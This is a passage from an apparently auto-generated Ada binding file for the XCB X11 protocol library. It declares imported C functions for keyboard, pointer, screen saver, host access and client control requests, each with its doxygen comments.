is used. -- * Otherwise, it stores the error if any. -- * -- * The returned value must be freed by the caller using free(). -- function xcb_list_extensions_reply (c : access xcb.xcb_connection_t; cookie : xcb_list_extensions_cookie_t; e : System.Address) return access xcb_list_extensions_reply_t -- /usr/include/xcb/xproto.h:11736 with Import => True, Convention => C, External_Name => "xcb_list_extensions_reply"; --*< function xcb_change_keyboard_mapping_sizeof (u_buffer : System.Address) return int -- /usr/include/xcb/xproto.h:11741 with Import => True, Convention => C, External_Name => "xcb_change_keyboard_mapping_sizeof"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- * This form can be used only if the request will not cause -- * a reply to be generated. Any returned error will be -- * saved for handling by xcb_request_check(). -- function xcb_change_keyboard_mapping_checked (c : access xcb.xcb_connection_t; keycode_count : bits_stdint_uintn_h.uint8_t; first_keycode : xcb_keycode_t; keysyms_per_keycode : bits_stdint_uintn_h.uint8_t; keysyms : access xcb_keysym_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:11755 with Import => True, Convention => C, External_Name => "xcb_change_keyboard_mapping_checked"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- function xcb_change_keyboard_mapping (c : access xcb.xcb_connection_t; keycode_count : bits_stdint_uintn_h.uint8_t; first_keycode : xcb_keycode_t; keysyms_per_keycode : bits_stdint_uintn_h.uint8_t; keysyms : access xcb_keysym_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:11770 with Import => True, Convention => C, External_Name => "xcb_change_keyboard_mapping"; function xcb_change_keyboard_mapping_keysyms (R : access constant xcb_change_keyboard_mapping_request_t) return access xcb_keysym_t -- /usr/include/xcb/xproto.h:11777 with Import => True, Convention => C, External_Name => "xcb_change_keyboard_mapping_keysyms"; function xcb_change_keyboard_mapping_keysyms_length (R : access constant xcb_change_keyboard_mapping_request_t) return int -- /usr/include/xcb/xproto.h:11780 with Import => True, Convention => C, External_Name => "xcb_change_keyboard_mapping_keysyms_length"; function xcb_change_keyboard_mapping_keysyms_end (R : access constant xcb_change_keyboard_mapping_request_t) return xcb.xcb_generic_iterator_t -- /usr/include/xcb/xproto.h:11783 with Import => True, Convention => C, External_Name => "xcb_change_keyboard_mapping_keysyms_end"; function xcb_get_keyboard_mapping_sizeof (u_buffer : System.Address) return int -- /usr/include/xcb/xproto.h:11786 with Import => True, Convention => C, External_Name => "xcb_get_keyboard_mapping_sizeof"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- function xcb_get_keyboard_mapping (c : access xcb.xcb_connection_t; first_keycode : xcb_keycode_t; count : bits_stdint_uintn_h.uint8_t) return xcb_get_keyboard_mapping_cookie_t -- /usr/include/xcb/xproto.h:11797 with Import => True, Convention => C, External_Name => "xcb_get_keyboard_mapping"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- * This form can be used only if the request will cause -- * a reply to be generated. Any returned error will be -- * placed in the event queue. -- function xcb_get_keyboard_mapping_unchecked (c : access xcb.xcb_connection_t; first_keycode : xcb_keycode_t; count : bits_stdint_uintn_h.uint8_t) return xcb_get_keyboard_mapping_cookie_t -- /usr/include/xcb/xproto.h:11813 with Import => True, Convention => C, External_Name => "xcb_get_keyboard_mapping_unchecked"; function xcb_get_keyboard_mapping_keysyms (R : access constant xcb_get_keyboard_mapping_reply_t) return access xcb_keysym_t -- /usr/include/xcb/xproto.h:11818 with Import => True, Convention => C, External_Name => "xcb_get_keyboard_mapping_keysyms"; function xcb_get_keyboard_mapping_keysyms_length (R : access constant xcb_get_keyboard_mapping_reply_t) return int -- /usr/include/xcb/xproto.h:11821 with Import => True, Convention => C, External_Name => "xcb_get_keyboard_mapping_keysyms_length"; function xcb_get_keyboard_mapping_keysyms_end (R : access constant xcb_get_keyboard_mapping_reply_t) return xcb.xcb_generic_iterator_t -- /usr/include/xcb/xproto.h:11824 with Import => True, Convention => C, External_Name => "xcb_get_keyboard_mapping_keysyms_end"; --* -- * Return the reply -- * @param c The connection -- * @param cookie The cookie -- * @param e The xcb_generic_error_t supplied -- * -- * Returns the reply of the request asked by -- * -- * The parameter @p e supplied to this function must be NULL if -- * xcb_get_keyboard_mapping_unchecked(). is used. -- * Otherwise, it stores the error if any. -- * -- * The returned value must be freed by the caller using free(). -- function xcb_get_keyboard_mapping_reply (c : access xcb.xcb_connection_t; cookie : xcb_get_keyboard_mapping_cookie_t; e : System.Address) return access xcb_get_keyboard_mapping_reply_t -- /usr/include/xcb/xproto.h:11841 with Import => True, Convention => C, External_Name => "xcb_get_keyboard_mapping_reply"; --*< function xcb_change_keyboard_control_value_list_serialize (u_buffer : System.Address; value_mask : bits_stdint_uintn_h.uint32_t; u_aux : access constant xcb_change_keyboard_control_value_list_t) return int -- /usr/include/xcb/xproto.h:11846 with Import => True, Convention => C, External_Name => "xcb_change_keyboard_control_value_list_serialize"; function xcb_change_keyboard_control_value_list_unpack (u_buffer : System.Address; value_mask : bits_stdint_uintn_h.uint32_t; u_aux : access xcb_change_keyboard_control_value_list_t) return int -- /usr/include/xcb/xproto.h:11851 with Import => True, Convention => C, External_Name => "xcb_change_keyboard_control_value_list_unpack"; function xcb_change_keyboard_control_value_list_sizeof (u_buffer : System.Address; value_mask : bits_stdint_uintn_h.uint32_t) return int -- /usr/include/xcb/xproto.h:11856 with Import => True, Convention => C, External_Name => "xcb_change_keyboard_control_value_list_sizeof"; function xcb_change_keyboard_control_sizeof (u_buffer : System.Address) return int -- /usr/include/xcb/xproto.h:11860 with Import => True, Convention => C, External_Name => "xcb_change_keyboard_control_sizeof"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- * This form can be used only if the request will not cause -- * a reply to be generated. Any returned error will be -- * saved for handling by xcb_request_check(). -- function xcb_change_keyboard_control_checked (c : access xcb.xcb_connection_t; value_mask : bits_stdint_uintn_h.uint32_t; value_list : System.Address) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:11874 with Import => True, Convention => C, External_Name => "xcb_change_keyboard_control_checked"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- function xcb_change_keyboard_control (c : access xcb.xcb_connection_t; value_mask : bits_stdint_uintn_h.uint32_t; value_list : System.Address) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:11887 with Import => True, Convention => C, External_Name => "xcb_change_keyboard_control"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- * This form can be used only if the request will not cause -- * a reply to be generated. Any returned error will be -- * saved for handling by xcb_request_check(). -- function xcb_change_keyboard_control_aux_checked (c : access xcb.xcb_connection_t; value_mask : bits_stdint_uintn_h.uint32_t; value_list : access constant xcb_change_keyboard_control_value_list_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:11903 with Import => True, Convention => C, External_Name => "xcb_change_keyboard_control_aux_checked"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- function xcb_change_keyboard_control_aux (c : access xcb.xcb_connection_t; value_mask : bits_stdint_uintn_h.uint32_t; value_list : access constant xcb_change_keyboard_control_value_list_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:11916 with Import => True, Convention => C, External_Name => "xcb_change_keyboard_control_aux"; function xcb_change_keyboard_control_value_list (R : access constant xcb_change_keyboard_control_request_t) return System.Address -- /usr/include/xcb/xproto.h:11921 with Import => True, Convention => C, External_Name => "xcb_change_keyboard_control_value_list"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- function xcb_get_keyboard_control (c : access xcb.xcb_connection_t) return xcb_get_keyboard_control_cookie_t -- /usr/include/xcb/xproto.h:11932 with Import => True, Convention => C, External_Name => "xcb_get_keyboard_control"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- * This form can be used only if the request will cause -- * a reply to be generated. Any returned error will be -- * placed in the event queue. -- function xcb_get_keyboard_control_unchecked (c : access xcb.xcb_connection_t) return xcb_get_keyboard_control_cookie_t -- /usr/include/xcb/xproto.h:11946 with Import => True, Convention => C, External_Name => "xcb_get_keyboard_control_unchecked"; --* -- * Return the reply -- * @param c The connection -- * @param cookie The cookie -- * @param e The xcb_generic_error_t supplied -- * -- * Returns the reply of the request asked by -- * -- * The parameter @p e supplied to this function must be NULL if -- * xcb_get_keyboard_control_unchecked(). is used. -- * Otherwise, it stores the error if any. -- * -- * The returned value must be freed by the caller using free(). -- function xcb_get_keyboard_control_reply (c : access xcb.xcb_connection_t; cookie : xcb_get_keyboard_control_cookie_t; e : System.Address) return access xcb_get_keyboard_control_reply_t -- /usr/include/xcb/xproto.h:11963 with Import => True, Convention => C, External_Name => "xcb_get_keyboard_control_reply"; --*< --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- * This form can be used only if the request will not cause -- * a reply to be generated. Any returned error will be -- * saved for handling by xcb_request_check(). -- function xcb_bell_checked (c : access xcb.xcb_connection_t; percent : bits_stdint_intn_h.int8_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:11979 with Import => True, Convention => C, External_Name => "xcb_bell_checked"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- function xcb_bell (c : access xcb.xcb_connection_t; percent : bits_stdint_intn_h.int8_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:11991 with Import => True, Convention => C, External_Name => "xcb_bell"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- * This form can be used only if the request will not cause -- * a reply to be generated. Any returned error will be -- * saved for handling by xcb_request_check(). -- function xcb_change_pointer_control_checked (c : access xcb.xcb_connection_t; acceleration_numerator : bits_stdint_intn_h.int16_t; acceleration_denominator : bits_stdint_intn_h.int16_t; threshold : bits_stdint_intn_h.int16_t; do_acceleration : bits_stdint_uintn_h.uint8_t; do_threshold : bits_stdint_uintn_h.uint8_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:12006 with Import => True, Convention => C, External_Name => "xcb_change_pointer_control_checked"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- function xcb_change_pointer_control (c : access xcb.xcb_connection_t; acceleration_numerator : bits_stdint_intn_h.int16_t; acceleration_denominator : bits_stdint_intn_h.int16_t; threshold : bits_stdint_intn_h.int16_t; do_acceleration : bits_stdint_uintn_h.uint8_t; do_threshold : bits_stdint_uintn_h.uint8_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:12022 with Import => True, Convention => C, External_Name => "xcb_change_pointer_control"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- function xcb_get_pointer_control (c : access xcb.xcb_connection_t) return xcb_get_pointer_control_cookie_t -- /usr/include/xcb/xproto.h:12038 with Import => True, Convention => C, External_Name => "xcb_get_pointer_control"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- * This form can be used only if the request will cause -- * a reply to be generated. Any returned error will be -- * placed in the event queue. -- function xcb_get_pointer_control_unchecked (c : access xcb.xcb_connection_t) return xcb_get_pointer_control_cookie_t -- /usr/include/xcb/xproto.h:12052 with Import => True, Convention => C, External_Name => "xcb_get_pointer_control_unchecked"; --* -- * Return the reply -- * @param c The connection -- * @param cookie The cookie -- * @param e The xcb_generic_error_t supplied -- * -- * Returns the reply of the request asked by -- * -- * The parameter @p e supplied to this function must be NULL if -- * xcb_get_pointer_control_unchecked(). is used. -- * Otherwise, it stores the error if any. -- * -- * The returned value must be freed by the caller using free(). -- function xcb_get_pointer_control_reply (c : access xcb.xcb_connection_t; cookie : xcb_get_pointer_control_cookie_t; e : System.Address) return access xcb_get_pointer_control_reply_t -- /usr/include/xcb/xproto.h:12069 with Import => True, Convention => C, External_Name => "xcb_get_pointer_control_reply"; --*< --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- * This form can be used only if the request will not cause -- * a reply to be generated. Any returned error will be -- * saved for handling by xcb_request_check(). -- function xcb_set_screen_saver_checked (c : access xcb.xcb_connection_t; timeout : bits_stdint_intn_h.int16_t; interval : bits_stdint_intn_h.int16_t; prefer_blanking : bits_stdint_uintn_h.uint8_t; allow_exposures : bits_stdint_uintn_h.uint8_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:12085 with Import => True, Convention => C, External_Name => "xcb_set_screen_saver_checked"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- function xcb_set_screen_saver (c : access xcb.xcb_connection_t; timeout : bits_stdint_intn_h.int16_t; interval : bits_stdint_intn_h.int16_t; prefer_blanking : bits_stdint_uintn_h.uint8_t; allow_exposures : bits_stdint_uintn_h.uint8_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:12100 with Import => True, Convention => C, External_Name => "xcb_set_screen_saver"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- function xcb_get_screen_saver (c : access xcb.xcb_connection_t) return xcb_get_screen_saver_cookie_t -- /usr/include/xcb/xproto.h:12115 with Import => True, Convention => C, External_Name => "xcb_get_screen_saver"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- * This form can be used only if the request will cause -- * a reply to be generated. Any returned error will be -- * placed in the event queue. -- function xcb_get_screen_saver_unchecked (c : access xcb.xcb_connection_t) return xcb_get_screen_saver_cookie_t -- /usr/include/xcb/xproto.h:12129 with Import => True, Convention => C, External_Name => "xcb_get_screen_saver_unchecked"; --* -- * Return the reply -- * @param c The connection -- * @param cookie The cookie -- * @param e The xcb_generic_error_t supplied -- * -- * Returns the reply of the request asked by -- * -- * The parameter @p e supplied to this function must be NULL if -- * xcb_get_screen_saver_unchecked(). is used. -- * Otherwise, it stores the error if any. -- * -- * The returned value must be freed by the caller using free(). -- function xcb_get_screen_saver_reply (c : access xcb.xcb_connection_t; cookie : xcb_get_screen_saver_cookie_t; e : System.Address) return access xcb_get_screen_saver_reply_t -- /usr/include/xcb/xproto.h:12146 with Import => True, Convention => C, External_Name => "xcb_get_screen_saver_reply"; --*< function xcb_change_hosts_sizeof (u_buffer : System.Address) return int -- /usr/include/xcb/xproto.h:12151 with Import => True, Convention => C, External_Name => "xcb_change_hosts_sizeof"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- * This form can be used only if the request will not cause -- * a reply to be generated. Any returned error will be -- * saved for handling by xcb_request_check(). -- function xcb_change_hosts_checked (c : access xcb.xcb_connection_t; mode : bits_stdint_uintn_h.uint8_t; family : bits_stdint_uintn_h.uint8_t; address_len : bits_stdint_uintn_h.uint16_t; address : access bits_stdint_uintn_h.uint8_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:12165 with Import => True, Convention => C, External_Name => "xcb_change_hosts_checked"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- function xcb_change_hosts (c : access xcb.xcb_connection_t; mode : bits_stdint_uintn_h.uint8_t; family : bits_stdint_uintn_h.uint8_t; address_len : bits_stdint_uintn_h.uint16_t; address : access bits_stdint_uintn_h.uint8_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:12180 with Import => True, Convention => C, External_Name => "xcb_change_hosts"; function xcb_change_hosts_address (R : access constant xcb_change_hosts_request_t) return access bits_stdint_uintn_h.uint8_t -- /usr/include/xcb/xproto.h:12187 with Import => True, Convention => C, External_Name => "xcb_change_hosts_address"; function xcb_change_hosts_address_length (R : access constant xcb_change_hosts_request_t) return int -- /usr/include/xcb/xproto.h:12190 with Import => True, Convention => C, External_Name => "xcb_change_hosts_address_length"; function xcb_change_hosts_address_end (R : access constant xcb_change_hosts_request_t) return xcb.xcb_generic_iterator_t -- /usr/include/xcb/xproto.h:12193 with Import => True, Convention => C, External_Name => "xcb_change_hosts_address_end"; function xcb_host_sizeof (u_buffer : System.Address) return int -- /usr/include/xcb/xproto.h:12196 with Import => True, Convention => C, External_Name => "xcb_host_sizeof"; function xcb_host_address (R : access constant xcb_host_t) return access bits_stdint_uintn_h.uint8_t -- /usr/include/xcb/xproto.h:12199 with Import => True, Convention => C, External_Name => "xcb_host_address"; function xcb_host_address_length (R : access constant xcb_host_t) return int -- /usr/include/xcb/xproto.h:12202 with Import => True, Convention => C, External_Name => "xcb_host_address_length"; function xcb_host_address_end (R : access constant xcb_host_t) return xcb.xcb_generic_iterator_t -- /usr/include/xcb/xproto.h:12205 with Import => True, Convention => C, External_Name => "xcb_host_address_end"; --* -- * Get the next element of the iterator -- * @param i Pointer to a xcb_host_iterator_t -- * -- * Get the next element in the iterator. The member rem is -- * decreased by one. The member data points to the next -- * element. The member index is increased by sizeof(xcb_host_t) -- procedure xcb_host_next (i : access xcb_host_iterator_t) -- /usr/include/xcb/xproto.h:12216 with Import => True, Convention => C, External_Name => "xcb_host_next"; --* -- * Return the iterator pointing to the last element -- * @param i An xcb_host_iterator_t -- * @return The iterator pointing to the last element -- * -- * Set the current element in the iterator to the last element. -- * The member rem is set to 0. The member data points to the -- * last element. -- function xcb_host_end (i : xcb_host_iterator_t) return xcb.xcb_generic_iterator_t -- /usr/include/xcb/xproto.h:12228 with Import => True, Convention => C, External_Name => "xcb_host_end"; function xcb_list_hosts_sizeof (u_buffer : System.Address) return int -- /usr/include/xcb/xproto.h:12231 with Import => True, Convention => C, External_Name => "xcb_list_hosts_sizeof"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- function xcb_list_hosts (c : access xcb.xcb_connection_t) return xcb_list_hosts_cookie_t -- /usr/include/xcb/xproto.h:12242 with Import => True, Convention => C, External_Name => "xcb_list_hosts"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- * This form can be used only if the request will cause -- * a reply to be generated. Any returned error will be -- * placed in the event queue. -- function xcb_list_hosts_unchecked (c : access xcb.xcb_connection_t) return xcb_list_hosts_cookie_t -- /usr/include/xcb/xproto.h:12256 with Import => True, Convention => C, External_Name => "xcb_list_hosts_unchecked"; function xcb_list_hosts_hosts_length (R : access constant xcb_list_hosts_reply_t) return int -- /usr/include/xcb/xproto.h:12259 with Import => True, Convention => C, External_Name => "xcb_list_hosts_hosts_length"; function xcb_list_hosts_hosts_iterator (R : access constant xcb_list_hosts_reply_t) return xcb_host_iterator_t -- /usr/include/xcb/xproto.h:12262 with Import => True, Convention => C, External_Name => "xcb_list_hosts_hosts_iterator"; --* -- * Return the reply -- * @param c The connection -- * @param cookie The cookie -- * @param e The xcb_generic_error_t supplied -- * -- * Returns the reply of the request asked by -- * -- * The parameter @p e supplied to this function must be NULL if -- * xcb_list_hosts_unchecked(). is used. -- * Otherwise, it stores the error if any. -- * -- * The returned value must be freed by the caller using free(). -- function xcb_list_hosts_reply (c : access xcb.xcb_connection_t; cookie : xcb_list_hosts_cookie_t; e : System.Address) return access xcb_list_hosts_reply_t -- /usr/include/xcb/xproto.h:12279 with Import => True, Convention => C, External_Name => "xcb_list_hosts_reply"; --*< --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- * This form can be used only if the request will not cause -- * a reply to be generated. Any returned error will be -- * saved for handling by xcb_request_check(). -- function xcb_set_access_control_checked (c : access xcb.xcb_connection_t; mode : bits_stdint_uintn_h.uint8_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:12295 with Import => True, Convention => C, External_Name => "xcb_set_access_control_checked"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- function xcb_set_access_control (c : access xcb.xcb_connection_t; mode : bits_stdint_uintn_h.uint8_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:12307 with Import => True, Convention => C, External_Name => "xcb_set_access_control"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- * This form can be used only if the request will not cause -- * a reply to be generated. Any returned error will be -- * saved for handling by xcb_request_check(). -- function xcb_set_close_down_mode_checked (c : access xcb.xcb_connection_t; mode : bits_stdint_uintn_h.uint8_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:12322 with Import => True, Convention => C, External_Name => "xcb_set_close_down_mode_checked"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- function xcb_set_close_down_mode (c : access xcb.xcb_connection_t; mode : bits_stdint_uintn_h.uint8_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:12334 with Import => True, Convention => C, External_Name => "xcb_set_close_down_mode"; --* -- * @brief kills a client -- * -- * @param c The connection -- * @param resource Any resource belonging to the client (for example a Window), used to identify -- * the client connection. -- * \n -- * The special value of `XCB_KILL_ALL_TEMPORARY`, the resources of all clients -- * that have terminated in `RetainTemporary` (TODO) are destroyed. -- * @return A cookie -- * -- * Forces a close down of the client that created the specified \a resource. -- * -- * This form can be used only if the request will not cause -- * a reply to be generated. Any returned error will be -- * saved for handling by xcb_request_check(). -- function xcb_kill_client_checked (c : access xcb.xcb_connection_t; resource : bits_stdint_uintn_h.uint32_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:12355 with Import => True, Convention => C, External_Name => "xcb_kill_client_checked"; --* -- * @brief kills a client -- * -- * @param c The connection -- * @param resource Any resource belonging to the client (for example a Window), used to identify -- * the client connection. -- * \n -- * The special value of `XCB_KILL_ALL_TEMPORARY`, the resources of all clients -- * that have terminated in `RetainTemporary` (TODO) are destroyed. -- * @return A cookie -- * -- * Forces a close down of the client that created the specified \a resource. -- * -- function xcb_kill_client (c : access xcb.xcb_connection_t; resource : bits_stdint_uintn_h.uint32_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:12373 with Import => True, Convention => C, External_Name => "xcb_kill_client"; function xcb_rotate_properties_sizeof (u_buffer : System.Address) return int -- /usr/include/xcb/xproto.h:12377 with Import => True, Convention => C, External_Name => "xcb_rotate_properties_sizeof"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- * This form can be used only if the request will not cause -- * a reply to be generated. Any returned error will be -- * saved for handling by xcb_request_check(). -- function xcb_rotate_properties_checked (c : access xcb.xcb_connection_t; window : xcb_window_t; atoms_len : bits_stdint_uintn_h.uint16_t; c_delta : bits_stdint_intn_h.int16_t; atoms : access xcb_atom_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:12391 with Import => True, Convention => C, External_Name => "xcb_rotate_properties_checked"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- function xcb_rotate_properties (c : access xcb.xcb_connection_t; window : xcb_window_t; atoms_len : bits_stdint_uintn_h.uint16_t; c_delta : bits_stdint_intn_h.int16_t; atoms : access xcb_atom_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:12406 with Import => True, Convention => C, External_Name => "xcb_rotate_properties"; function xcb_rotate_properties_atoms (R : access constant xcb_rotate_properties_request_t) return access xcb_atom_t -- /usr/include/xcb/xproto.h:12413 with Import => True, Convention => C, External_Name => "xcb_rotate_properties_atoms"; function xcb_rotate_properties_atoms_length (R : access constant xcb_rotate_properties_request_t) return int -- /usr/include/xcb/xproto.h:12416 with Import => True, Convention => C, External_Name => "xcb_rotate_properties_atoms_length"; function xcb_rotate_properties_atoms_end (R : access constant xcb_rotate_properties_request_t) return xcb.xcb_generic_iterator_t -- /usr/include/xcb/xproto.h:12419 with Import => True, Convention => C, External_Name => "xcb_rotate_properties_atoms_end"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- * This form can be used only if the request will not cause -- * a reply to be generated. Any returned error will be -- * saved for handling by xcb_request_check(). -- function xcb_force_screen_saver_checked (c : access xcb.xcb_connection_t; mode : bits_stdint_uintn_h.uint8_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:12433 with Import => True, Convention => C, External_Name => "xcb_force_screen_saver_checked"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- function xcb_force_screen_saver (c : access xcb.xcb_connection_t; mode : bits_stdint_uintn_h.uint8_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:12445 with Import => True, Convention => C, External_Name => "xcb_force_screen_saver"; function xcb_set_pointer_mapping_sizeof (u_buffer : System.Address) return int -- /usr/include/xcb/xproto.h:12449 with Import => True, Convention => C, External_Name => "xcb_set_pointer_mapping_sizeof"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- function xcb_set_pointer_mapping (c : access xcb.xcb_connection_t; map_len : bits_stdint_uintn_h.uint8_t; map : access bits_stdint_uintn_h.uint8_t) return xcb_set_pointer_mapping_cookie_t -- /usr/include/xcb/xproto.h:12460 with Import => True, Convention => C, External_Name => "xcb_set_pointer_mapping"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- * This form can be used only if the request will cause -- * a reply to be generated. Any returned error will be -- * placed in the event queue. -- function xcb_set_pointer_mapping_unchecked (c : access xcb.xcb_connection_t; map_len : bits_stdint_uintn_h.uint8_t; map : access bits_stdint_uintn_h.uint8_t) return xcb_set_pointer_mapping_cookie_t -- /usr/include/xcb/xproto.h:12476 with Import => True, Convention => C, External_Name => "xcb_set_pointer_mapping_unchecked"; --* -- * Return the reply -- * @param c The connection -- * @param cookie The cookie -- * @param e The xcb_generic_error_t supplied -- * -- * Returns the reply of the request asked by -- * -- * The parameter @p e supplied to this function must be NULL if -- * xcb_set_pointer_mapping_unchecked(). is used. -- * Otherwise, it stores the error if any. -- * -- * The returned value must be freed by the caller using free(). -- function xcb_set_pointer_mapping_reply (c : access xcb.xcb_connection_t; cookie : xcb_set_pointer_mapping_cookie_t; e : System.Address) return access xcb_set_pointer_mapping_reply_t -- /usr/include/xcb/xproto.h:12495 with Import => True, Convention => C, External_Name => "xcb_set_pointer_mapping_reply"; --*< function xcb_get_pointer_mapping_sizeof (u_buffer : System.Address) return int -- /usr/include/xcb/xproto.h:12500 with Import => True, Convention => C, External_Name => "xcb_get_pointer_mapping_sizeof"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- function xcb_get_pointer_mapping (c : access xcb.xcb_connection_t) return xcb_get_pointer_mapping_cookie_t -- /usr/include/xcb/xproto.h:12511 with Import => True, Convention => C, External_Name => "xcb_get_pointer_mapping"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- * This form can be used only if the request will cause -- * a reply to be generated. Any returned error will be -- * placed in the event queue. -- function xcb_get_pointer_mapping_unchecked (c : access xcb.xcb_connection_t) return xcb_get_pointer_mapping_cookie_t -- /usr/include/xcb/xproto.h:12525 with Import => True, Convention => C, External_Name => "xcb_get_pointer_mapping_unchecked"; function xcb_get_pointer_mapping_map (R : access constant xcb_get_pointer_mapping_reply_t) return access bits_stdint_uintn_h.uint8_t -- /usr/include/xcb/xproto.h:12528 with Import => True, Convention => C, External_Name => "xcb_get_pointer_mapping_map"; function xcb_get_pointer_mapping_map_length (R : access constant xcb_get_pointer_mapping_reply_t) return int -- /usr/include/xcb/xproto.h:12531 with Import => True, Convention => C, External_Name => "xcb_get_pointer_mapping_map_length"; function xcb_get_pointer_mapping_map_end (R : access constant xcb_get_pointer_mapping_reply_t) return xcb.xcb_generic_iterator_t -- /usr/include/xcb/xproto.h:12534 with Import => True, Convention => C, External_Name => "xcb_get_pointer_mapping_map_end"; --* -- * Return the reply -- * @param c The connection -- * @param cookie The cookie -- * @param e The xcb_generic_error_t supplied -- * -- * Returns the reply of the request asked by -- * -- * The parameter @p e supplied to this function must be NULL if -- * xcb_get_pointer_mapping_unchecked(). is used. -- * Otherwise, it stores the error if any. -- * -- * The returned value must be freed by the caller using free(). -- function xcb_get_pointer_mapping_reply (c : access xcb.xcb_connection_t; cookie : xcb_get_pointer_mapping_cookie_t; e : System.Address) return access xcb_get_pointer_mapping_reply_t -- /usr/include/xcb/xproto.h:12551 with Import => True, Convention => C, External_Name => "xcb_get_pointer_mapping_reply"; --*< function xcb_set_modifier_mapping_sizeof (u_buffer : System.Address) return int -- /usr/include/xcb/xproto.h:12556 with Import => True, Convention => C, External_Name => "xcb_set_modifier_mapping_sizeof"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- function xcb_set_modifier_mapping (c : access xcb.xcb_connection_t; keycodes_per_modifier : bits_stdint_uintn_h.uint8_t; keycodes : access xcb_keycode_t) return xcb_set_modifier_mapping_cookie_t -- /usr/include/xcb/xproto.h:12567 with Import => True, Convention => C, External_Name => "xcb_set_modifier_mapping"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- * This form can be used only if the request will cause -- * a reply to be generated. Any returned error will be -- * placed in the event queue. -- function xcb_set_modifier_mapping_unchecked (c : access xcb.xcb_connection_t; keycodes_per_modifier : bits_stdint_uintn_h.uint8_t; keycodes : access xcb_keycode_t) return xcb_set_modifier_mapping_cookie_t -- /usr/include/xcb/xproto.h:12583 with Import => True, Convention => C, External_Name => "xcb_set_modifier_mapping_unchecked"; --* -- * Return the reply -- * @param c The connection -- * @param cookie The cookie -- * @param e The xcb_generic_error_t supplied -- * -- * Returns the reply of the request asked by -- * -- * The parameter @p e supplied to this function must be NULL if -- * xcb_set_modifier_mapping_unchecked(). is used. -- * Otherwise, it stores the error if any. -- * -- * The returned value must be freed by the caller using 